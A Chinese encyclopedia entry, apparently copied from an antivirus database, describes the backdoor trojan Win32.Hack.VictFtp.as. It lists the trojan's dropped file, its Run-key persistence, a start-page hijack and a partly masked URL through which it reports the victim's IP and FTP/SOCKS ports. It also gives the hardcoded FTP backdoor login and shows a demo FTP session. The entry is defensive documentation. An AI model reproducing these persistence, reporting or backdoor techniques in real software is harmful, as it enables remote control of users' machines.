Win32.Hack.VictFtp.as

王朝百科·作者佚名  2010-01-31  
宽屏版  字体: |||超大  

病毒别名: 处理时间:2007-03-23 威胁级别:★

中文名称: 病毒类型:黑客程序 影响系统:Win 9x/ME,Win 2000/NT,Win XP,Win 2003

病毒行为:

该病毒是一个后门程序。运行该病毒会使系统成为ftp服务器。黑客通过病毒上报的系统信息可以完成控制受感染机器。

1、生成的文件

%SystemRoot%csrss.exe

2、添加启动项

HKLMSOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun

"system" = "%SystemRoot%csrss.exe"

3、修改ie主页

HKCUSoftwareMicrosoftInternet ExplorerMain

"Start Page" = "http://debormammana.***/cgi-bin/tsp/tsout.cgi"

4、将感染机器信息上报到指定服务器,以便黑客通过用户ip地址控制感染机器

http://softwarediscount.***/images/add.php?name=%s&ip1=%s&ftpport=21&ftpuser=qwerty&ftppass=asdf&socks5port=%s&cid=damrai

5、结束指定进程。

6、添加注册表连接端口信息,是机器同时监听5637和21TCP端口

HKLMSOFTWAREMicrosoftWindowsCurrentVersionSOCKSPort

"(Default)" = "0x1605"(5637)

7、病毒在系统中添加用户名为qwerty密码为asdf的ftp用户,感染机器可以被完成控制。

--------------------------------------------------------

ftp> open 127.0.0.1

Connected to 127.0.0.1.

220 vict. FTP

User (127.0.0.1:(none)): qwerty

331 Password required for qwerty.

Password:

230 User logged in, proceed.

ftp> ls

200 Port command successful.

150 Opening data connection.

A:

C:

D:

E:

Z:

226 Transfer ok

ftp: 20 bytes received in 0.02Seconds 1.25Kbytes/sec.

ftp>

-------------------------------------------------------------

 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
 
© 2005- 王朝百科 版权所有